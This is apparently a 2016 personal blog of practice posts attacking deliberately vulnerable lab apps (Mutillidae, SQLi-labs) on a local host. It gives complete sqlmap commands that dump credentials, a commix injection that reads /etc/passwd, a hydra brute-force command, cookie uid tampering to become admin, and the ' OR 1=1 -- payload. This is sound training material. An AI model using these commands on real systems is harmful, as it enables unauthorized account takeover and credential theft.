Tuesday, 19 January 2016

New version of mutillidae released

A new version of mutillidae has been released, the current version is 2.6.34, dont forget to download the md5 checksum for the zip file and then verify the integrity of the download

echo 1ebe063a0b258093b5df45e81fe8954e LATEST-mutillidae-2.6.34.zip | md5sum -c

available from sourceforge

update I've sent jeremy druin aka webpwnized a message stating that after install etc the version shows as 2.6.32 not sure if the error is in the upload or directly in web app it self

awaiting response

update: according to webpwnized this will be fixed in a coming update, for know I can edit the the /includes/constants.php file myself and correct it

Wednesday, 13 January 2016

Sqli-labs Object: GET - Error based - Single quotes - String lesson 1

Practice sql injection hacking skills using this vulnerable sql framework

browser:iceweasel
os: kali linux
Web App: SQL-Labs

SQLi-LABS can be downloaded from

https://github.com/Audi-1/sqli-labs

There are several lessons and I will iterate through them all starting with less-1

lesson: number 1
Object: GET - Error based - Single quotes - String

This is simple stuff, simply visit

http://192.168.0.9/sqli-labs/Less-1/ 

we are met with an info message

Please input the ID as parameter with numeric value

we can achieve simply appending the following to the url

?id=1

so our full url will now look like 

http://192.168.0.9/sqli-labs/Less-1/?id=1


a users username & password are returned to the screen changing ?id=1 to for example ?id=2 will display different credentials.

To get a simple error message produced on the screen simply append 
' (a single quote) to the url
which returns the following error message 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1    
this bares all the hallmarks of a sql injection vulnerability, so therefore lets fire up sqlmap

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" --dbs

this gives us the names of the databases



 if your not sure which database to look in you'll have to poke around and see, our target is the security database, next we want to have a look at the available tables therefore our next command is 

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security --tables

 



  now then the users table looks interesting, lets go ahead and see whats inside, we have the database name and table name now we need to see whats in the column, heres the new command

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users --columns

awesome the column contains id's passwords and usernames we want to see all that, heres the final command.

sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users -C id,password,username --dump


we have sucessfully a exploited the sql injection vulnerability to retrieve all id's usernames and passwords from the mysql database

remember in the previous post sqlmap-database-takeover-tool-old-skool 
we had to use the --data="" switch this was because the method was post and in this example the method is get therefore there was no need use --data=""
 

SQLMAP Database Hacking - An Easier Way

Using sqlmap in conjuction with burpsuite (easy)

tools:sqlmap, burpsuite
OS: kali linux

previously in this blog post we used passed some parameters to sqlmap to aid in our attack, well there is a faster method of passing data to sqlmap from burpsuite and its easy

navigate to

  • http://192.168.0.9/mutillidae/index.php?page=login.php

which is the login page we wish to bypass

  • attempt to login using ANY username & ANY password 
  • capture the POST request using burpsuite
  • right click on the request 
  • select save item (then save to your chosen location)
now we can run the sqlmap command easily without passing all the parameters to it  we simply run

sqlmap -r "PATH_TO_SAVED_REQUEST"


I saved the request as sqlmap-practice

This makes it much easier to pass data to sqlmap, however to fully exploit the database ie hack the accounts we still need to find out the following;

database name
database tables
database column

this can only be done (as far as im aware) via experience and/or trial and error

I've utilized this easier method to successfully attack and own all
OWASP A1 (SQL Injection lessons) in mutillidae

SQLMAP - Database takeover tool - the old skool way

Hacking mysql database via SQLMAP

here I will demonstrate a sql injection attack using SQLMAP, I will use this hack to bypass a login

Tools:SQLMAP/Burpsuite
Browser:Iceweasel
Web App:Mutillidae v2.6.30
OS:Kali Linux

First;
  • configure browser and proxy (I'm using burpsuite) then head to 
  •  http://192.168.0.9/mutillidae/index.php?page=login.php 
  • enter some data in the username & password fields
  • In burp review the data from the post capture we need some info for it


so using the capture above we can now begin constructing our sqlmap command.

sqlmap --url="ENTER_FULL_URL_HERE" (this is a combination of the host and post field as shown above)

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"

next part of the command
--data="ENTER_DATA_HERE" (this is actually the body of the post request)

--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"

and finally 
--banner (retrieves database banner)

the sqlmap command is now complete. our full sqlmap command is;

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner 

(a truncated video displaying the outcome of the injection)(**banner**) 


BYPASSING A LOGIN USING SQLMAP 


 so we are 100% certain that the mysql database is vulnerable to sql injection, now we will escalate our attack and see what credentials we can grab

So now as we know we need to bypass the loggin presented to us on the login page, we know now that the application vulnerable to sql injection so we will mount an attack to verify this. We already have the main command for the attack already

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"  

we simply need to append the command slightly, first new command/switch/paramemter we enter is 

--dbs (this tells us the available databases)

there  was 6 options 

form experience I know that the database we need to attack is named nowasp, now we can further ammend our sqlmap command to ;

 remove --dbs (as we now know the name of the databse that we need to hack)
add
-D owasp 
and add
--tables (the tables switch will list all tables within the database owasp)

 again experience tells me i want to retrieve the info held within the accounts table
we can now further ammend our command
remove
--tables
add
-T accounts
add
--Columns (gives us a list of columns to select info from  
bingo we know have a full list of all the columns of info we want to retrieve, in this case i want
firstname
lastname
password
username
we are now ready to complete our sqlmap command and hack so we
remove
--columns 
and add
-C firstname,lastname,password,username
we need to --dump all credentials retrieved so we can see them so we us the --dump command, our full sqlmap injection command is

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump

we have successfully retrieved all usernames & passwords for the login to the system thereby bypassing any need for us to need our own login.



 


Monday, 11 January 2016

Verify checksum of files on linux


when downloading files especially from the Internet, its crucial that you verify your download, this will help you release if the actual you file you have just downloaded has been tampered with in any way by another party.

In this example we have just downloaded WebGoat from the interweb the filename and checksum is displayed in the pic below


filename: WebGoat-5.4-OWASP_Standard_Win32.zip
SHA1 Checksum: eb61e9eadb00ae62796110bedf16366a8a15c02f

to verify this in linux (kali) this is simple, simply enter teh command as shown below 

echo eb61e9eadb00ae62796110bedf16366a8a15c02f WebGoat-5.4-OWASP_Standard_Win32.zip | sha1sum -c - 


sha1sum checksum    







to verify that the  sha1sum matches the filename, the output returned is 
 however if there was a mismatch you will see;




 

OWASP A1 - Injection - Other Commix OS command injection tool

OWASP A1 INJECTION OTHER

tools: commix burpsuite iceweasel

Vulnerable app:Mutillidae V2.6.30

Came across this tool recently commix (Command Injection eXploiter) so i thought i best put it to the test and heres what i did 

commix --url="http://192.168.0.9/mutillidae/index.php?page=dns-lookup.php" --data="target_host=INJECT_HERE&dns-lookup-php-submit-button=Lookup+DNS" --cookie "showhints=1; PHPSESSID=bf0t3nlg0f67u34f36gvaug5r7" --os-cmd="cat /etc/passwd" 

so lets look at where we got these parameters from in detail

--url="http://192.168.0.9/mutillidae/index.php?page=dns-lookup.php"  

--url="" is the param for entering a url, between the quotes is the  ACTUAL url of the web page we want to test command injection on in this case its the dns lookup page of mutillidae 

 --data="target_host=INJECT_HERE&dns-lookup-php-submit-button=Lookup+DNS"

--data="" is the actual param for entering data in this case its the post data of the request produced when submitting the page, we insert the actual data BETWEEN the double quotes. To get the actual data follow these steps
  • on the dns lookup page enter a IP or hostname and click Lookup DNS
  •  in burp suite highlight the bottom line and replace www.google.com with INJECT_HERE


  • then copy & paste the entire line BETWEEN the double quotes
--cookie="" is the param where the  cookie goes

copy the cookie as shown above from burpsuite (or an add on like tamper data) and paste directly between the double quotes

finally we use --os-cmd="cat /etc/passwd" 
--os-cmd="" allows a single os command to be executed
cat /etc/passwd is the command we have injected and gives us a list of users in the system

The output is printed to screen as shown below




A video of the full attack is shown below 

A more (visually improved) method of getting the output of cat /etc/passwd is via commix built in enumeration by using the switch

--users 
watch the video below to see commix in action enumerating users






Friday, 8 January 2016

Enumerating usernames

Enumerating usernames

Tools used;
browser:iceweasel
web app: Mutillidae

This simply will let us know if a username has already been used, to achieve this simply attempt to log in with usernames, it doesn't matter if you don't know the password as we are simply enumerating usernames so we can later launch a brute force attack

first we use one test username we have no idea if this username has been used already (I used the name jess) the result was
therefore there is no username of jess registered on the system

secondly i used a common username admin  the result is
this clearly demonstrates that although the password we supplied was incorrect there is definitely  a username called admin - we can now attempt to brute force the admin username using hydra or burpsuite (intruder)

mutillidae brute force login

Brute Force Web Login using Hydra

OS used: Kali Linux
Tool Used: hydra/ burp suite
web app: mutillidae



here is the command used in full;
hydra -l admin -P /root/Desktop/work/mutillidae/mutilldae-passwords 192.168.0.9  http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"


lets break it down

hydra > this is the name of the brute force program
-l admin > this tells the program to check the username admin (this was gained via enumeration earlier)
 -P /root/Desktop/work/mutillidae/mutilldae-passwords >this is the path to the password file used
192.168.0.9 > this is the host address (ip) of the server 
http-post-form > this is the type of form we are attacking
"/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

 "/mutillidae/index.php?page=login.php > this is the parameter to the login page the " is appended to the beginning

to work out the remainder of the command consider the following

 this was taken from burp suite and is the result of a POST request to the server in an attempt to login, we pass these paramemters in part to hydra to complete the command prior to attacking the login page. Hence the command continues with;
:username=^USER^&password=^PASS^&login-php-submit-button=Login
but there is still one more piece of info we need which is  
:Not Logged In"
the " is appended to the end the Not Logged In is the result of a user not been logged and is what is presented when you visit the log in page without logging in as shown below


remember these parameters will differ depending on the application used
the command

hydra -l admin -P /root/Desktop/work/mutillidae/mutilldae-passwords 192.168.0.9  http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

is now complete and we begin our attack


Brute Force Login Using Burp Suite Intruder

Brute Force Login Using Burp Suite Intruder

tools: burp suite & iceweasel
web app: mutillidae 

Here I use burp suite intruder to brute force the login of the admin user (remember we enumerated this in an earlier video)

here is the full video of how to brute force a login using burp suite

In short
  • ensure proxy is working 
  • capture a known bad request 
  • right click  on request and sent to burp intruder
  • set payload position
  • load payloads
  • attack
Its worth noting the following findings; in short; (in mutillidae)
  • where there is a response code of 302 a successful password has been found 
  • the length differs when compared to non successful logins, for example in the video 
successful logins have a length of 48763 (in mutillidae via burp suite)
unsuccessful logins have a length of 48669 (in mutillidae via burp suite)


OWASP A2 Broken Authentication and Session Management

OWASP A2 Broken Authentication and Session Management

bypass authentication via cookies

Tools: Burp Suite
web app: mutillidae 

To achieve this hack I do the following

  • setup our proxy
  • register 2 brand new usernames HelenC & SamF
  •  login as HelenC then logout
  • login as SamF then logout
  • next  (in burp) under proxy > http history > pick out the 2 requests that authenticated both users (they have a response code of 302 AND the method is POST 
  •  right click on the first post message and select send to comparer (request) 
  • right click on the second post message and select send to comparer (request) 
we want to compare the server responses when logging in as both users to see if there is any pattern we can detect, if there is a well defined pattern in the servers responses we might be able to exploit this to gain unauthenticated access to another users data
  • next click on the comparer tab and select words
as you can see burp automatically compares the 2 server responses and highlights any changes. From this we can clearly see that  server first responded to the user HelenC with (amongst other things) the following header;
Set-Cookie: uid=24
for Sam this value has increment in value by 1, therefore SamF recieved the following header
Set-Cookie: uid=25


This tells me that server (potentially) increments the value of the set-cookie: uid by 1 each time a user registers. Now I will attempt to exploit this behavior by modifying the value of
Set-Cookie: uid=24
to
Set-Cookie: uid=1

lets see what happens




and it worked we have sucessfully logged in as the admin simply by changing the value of 

Set-cookie: uid= 

in the response from the server

for this hack to work you must log in with a known good  username & password (simply register one yourself)

**pls note there are other paramemters that could be tampered with to achieve the same result but this post is simply about tampering with the 

Set-cookie: uid=

OWASP A1 Injection

sqli extract user info low security

  web app: mutillidae
  browser: iceweasel

In this post we will attempt to extract user data from a database using sql injection


 to test for a sqli vulnerability i simply add a single quote into the Name field
this result in information leakage which aids my attack and also exposes many other vulnerabilities however we are solely concerned with obtaining user info. heres the error message


This tells my the database is MySQL it also crucially tells me the ACTUAL SQL query performed. This alone tells me that the paramemter/field Name is likely vulnerable to sql injection now we simply need to complete the sql statement to give us what we want
so we add some comments to our single quote, we add
OR 1=1
now 1 ALWAYS is equal to 1 therefore we are making the statement true
--
we dont have the password there fore using -- comments out the password request so now our full sqli payload is
' OR 1=1 -- <space after comments>
to achieve this we simply type the sql command in the name field
and as shown in the video all USERNAMES & PASSWORDS have been retrieved